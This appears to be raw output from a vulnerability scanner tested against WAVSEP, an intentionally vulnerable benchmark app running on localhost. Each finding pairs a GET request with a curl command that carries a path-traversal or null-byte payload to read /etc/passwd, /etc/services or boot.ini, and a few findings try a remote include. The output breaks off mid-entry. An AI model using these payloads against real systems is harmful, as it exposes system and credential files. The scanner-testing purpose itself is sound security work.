GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
